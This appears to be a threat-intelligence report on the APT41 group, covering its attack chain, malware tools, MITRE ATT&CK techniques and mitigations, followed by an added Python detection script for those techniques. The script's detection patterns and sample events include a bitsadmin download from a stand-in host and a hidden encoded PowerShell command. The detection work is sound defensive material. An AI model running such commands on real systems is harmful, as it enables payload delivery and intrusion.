By Ismael Rocha: An advanced persistent threat (APT) works to gain access to computer networks and systems without being detected or noticed. These threats, sometimes run by a nation-state or a state-sponsored group, can steal private and secret information, damage IT systems and disrupt the functioning of vital systems. Defending against advanced persistent threats is difficult, because they act stealthily and their intrusions can be hard to recognize.
Brazil has a wide variety of economic sectors, such as education/research, finance, health, government/military, retail, energy, communication and technology, among others. These sectors generate large sums of money for governments and organizations and consequently attract the interest of advanced threat groups. This explains the sharp increase in cyber attacks by cybercriminals aimed at financial gain, access to secret and confidential files, or disruption of the country.
Countries and segments targeted by APT41
APT41 is known for targeting various countries around the world. Regions where the group has already been active include Asia, Europe, North America and South America. Some of the countries that are known targets of APT41 include:
It is important to note that APT41 is a highly sophisticated and constantly evolving group, so this list may change over time. For the same reason, the list of target segments below may also change.
Threat mode of operation
The APT41 advanced threat group's attack chain can vary depending on the target and the specific objectives of the attack, but generally involves the following steps:
- Reconnaissance and information gathering: target research is carried out and information is gathered to understand the network infrastructure, technologies used and other relevant details;
- Delivery: a variety of techniques are used to deliver the malware or malicious payload to the organization's system or network, including phishing, spear phishing, malvertising, exploitation of vulnerabilities, among others;
- Exploitation: after the payload has been delivered, the group uses exploitation techniques to look for vulnerabilities in the organization's system or network in order to gain unauthorized access;
- Evasion of defenses: a presence is established on the organization's system or network, using evasion techniques to avoid detection;
- Lateral movement: the group moves laterally through the organization's system or network, looking for valuable information;
- Data exfiltration: APT41 collects and exfiltrates valuable data from the organization, including confidential information, intellectual property and other financial and strategic information;
- Persistence: APT41 maintains a persistent presence on the organization's system or network, allowing them to continue collecting information and carrying out malicious activities for an extended period;
- Impact and destruction: in some cases, APT41 can destroy data or carry out sabotage as part of its overall attack strategy.
It is important to note that the APT41 attack chain is highly sophisticated and constantly evolving, and may include other steps and/or variations depending on the target and the specific objectives of the attack.
Tools already used by APT41
APT41 has been observed using a variety of malware and tools, both public and exclusive to the group, to establish a foothold in the victim's environment, including:
- ASPXSpy
- ACEHASH
- Beacon
- CHINACHOP
- COLDJAVA
- CRACKSHOT
- CROSSWALK
- DEADEYE
- DOWNTIME
- EASYNIGHT
- Gh0st
- HIGHNOON.LITE
- HIGHNOON.PASTEBOY
- HOTCHAI
- HKDOOR
- JUMPALL
- LATELUNCH
- LIFEBOAT
- LOWKEY
- njRAT
- POISONPLUG
- POISONPLUG.SHADOW
- POTROAST
- SAGEHIRE
- SOGU
- SWEETCANDLE
- TERA
- TIDYELF
- XDOOR
- WINTERLOVE
- ZXSHELL
TTPs - MITRE ATT&CK
| Tactic | Technique | Details |
|---|---|---|
| Defense Evasion, Privilege Escalation | T1134 | APT41 used a BADPOTATO exploit obfuscated with ConfuserEx to abuse named pipe impersonation for NT AUTHORITY\SYSTEM local privilege escalation. |
| Persistence | T1098 | User accounts were added to the User and Admin groups. |
| Command and Control | T1071 | APT41 used HTTP to download payloads for the CVE-2019-19781 and CVE-2020-10189 exploits. |
| Collection | T1560 | A RAR archive of files targeted for exfiltration was created. |
| Defense Evasion, Persistence | T1197 | APT41 used BITSAdmin to download and install payloads. |
| Persistence, Privilege Escalation | T1547 | Initialization files were created and modified for persistence. A registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost was added to establish persistence for Cobalt Strike. |
| Credential Access | T1110 | Password brute-force attacks were carried out against the local administrator account. |
| Execution | T1059 | APT41 leveraged PowerShell to deploy malware families in victims' environments. |
| Impact | T1486 | Ransomware called Encryptor RaaS was used to encrypt files on the target systems and present the user with a ransom note. |
| Privilege Escalation, Persistence | T1546 | APT41 leveraged sticky keys to establish persistence. |
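As an added defender-side illustration (not from the report), the following Python check runs over constructed Sysmon-style and Windows Security events and flags the behaviours tabulated above: writes under the Svchost key (T1547), a sticky keys IFEO debugger (T1546, the usual route; the report names no specific key), bitsadmin transfers (T1197), encoded PowerShell (T1059) and a burst of failed logons against the administrator account (T1110). Event shapes, field names and the brute-force threshold are assumptions.

```python
import re
from collections import Counter

# Registry locations from the table above; the sticky keys IFEO debugger path
# is an assumption (the usual T1546 route), the report names no specific key.
SVCHOST_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"
STICKY_IFEO = r"\Image File Execution Options\sethc.exe\Debugger"

def detect(events, brute_threshold=5):
    """Return (technique, reason) pairs for events matching the tabulated TTPs."""
    hits, failed = [], Counter()
    for ev in events:
        eid, d = ev["EventID"], ev.get("Data", {})
        if eid == 13:  # Sysmon: registry value set
            target = d.get("TargetObject", "")
            if target.lower().startswith(SVCHOST_KEY.lower()):  # rare outside servicing
                hits.append(("T1547", f"svchost group write: {target}"))
            elif target.lower().endswith(STICKY_IFEO.lower()):
                hits.append(("T1546", f"sticky keys debugger -> {d.get('Details', '')}"))
        elif eid == 1:  # Sysmon: process creation
            cmd = d.get("CommandLine", "")
            if re.search(r"\bbitsadmin(\.exe)?\b.*\s/transfer\b", cmd, re.I):
                hits.append(("T1197", cmd))
            if re.search(r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s", cmd, re.I):
                hits.append(("T1059", cmd))
        elif eid == 4625:  # Windows Security: failed logon
            who = (d.get("TargetUserName", ""), d.get("IpAddress", ""))
            failed[who] += 1
            if failed[who] == brute_threshold:  # fire once per account/source pair
                hits.append(("T1110", f"{brute_threshold} failed logons for {who[0]} from {who[1]}"))
    return hits

# Constructed sample telemetry (not from the report): one event per technique,
# benign noise, and a five-attempt burst against the local administrator.
SAMPLE_EVENTS = [
    {"EventID": 13, "Data": {"TargetObject": SVCHOST_KEY + r"\netsvcs2", "Details": "updsvc"}},
    {"EventID": 13, "Data": {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                             + STICKY_IFEO, "Details": r"C:\Windows\System32\cmd.exe"}},
    {"EventID": 1, "Data": {"CommandLine": r"bitsadmin.exe /transfer job /download /priority high "
                            r"http://host.invalid/a.dat C:\Users\Public\a.dat"}},
    {"EventID": 1, "Data": {"CommandLine": "powershell.exe -nop -w hidden -enc ZgBvAG8A"}},
    {"EventID": 1, "Data": {"CommandLine": r"notepad.exe C:\notes.txt"}},
    {"EventID": 13, "Data": {"TargetObject": r"HKLM\SOFTWARE\Vendor\App\Setting", "Details": "1"}},
] + [{"EventID": 4625, "Data": {"TargetUserName": "Administrator", "IpAddress": "10.0.0.5"}}] * 5

if __name__ == "__main__":
    for technique, reason in detect(SAMPLE_EVENTS):
        print(technique, reason)
```

The T1110 rule fires once per account/source pair so a sustained brute-force does not flood the alert queue; tune the threshold to the environment's normal failed-logon rate.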
Indicators of Compromise (IoCs)
ISH Tecnologia handles a number of Indicators of Compromise collected through open and closed sources, as well as analysis carried out by the Heimdall security team. In view of this, below we list all the Indicators of Compromise (IOCs) related to the analysis of the artifact(s) in this report.
Distribution URLs and C2 IP addresses:
Note: the links and IP addresses listed above may still be active; handle these IoCs with care and do not click on them, so as not to become a victim of the malicious content hosted there.
How to protect yourself from the APT41 group
In addition to the indicators of compromise listed above by ISH, the following measures can be adopted to mitigate infection by this advanced persistent threat:
- Keep software up to date: it is important to keep the operating system, applications and security software up to date with the latest security updates. This corrects known vulnerabilities that can be exploited by APTs.
- Use multi-factor authentication: this helps protect against phishing attacks and stolen credentials. It adds an extra layer of security by requiring the user to provide additional information, beyond a password, in order to authenticate.
- Do not download attachments contained in suspicious emails and do not click on links in emails that appear to be malicious.
- Use encryption: this helps protect sensitive information, such as customer and corporate data, from being accessed by APTs.
- Back up regularly: cultivating this practice for critical data helps protect against data loss caused by APT attacks.
- Implement network security controls: firewalls, IDS/IPS and advanced threat detection can help identify and block APTs before they cause damage.
- Carry out security awareness training: this helps educate users about security threats and how to protect themselves against them.
- Perform behavior analysis: this helps detect suspicious activity within the network, such as transfers of large amounts of data to unknown locations or attempts to access confidential resources outside working hours.
- Adopt a company-wide security posture: to be effective against APTs, companies must adopt a comprehensive approach to security that includes policies and procedures, security controls and regular security awareness training.
References
- Heimdall by ISH Tecnologia
- Mandiant
- Trend Micro
- hhs.gov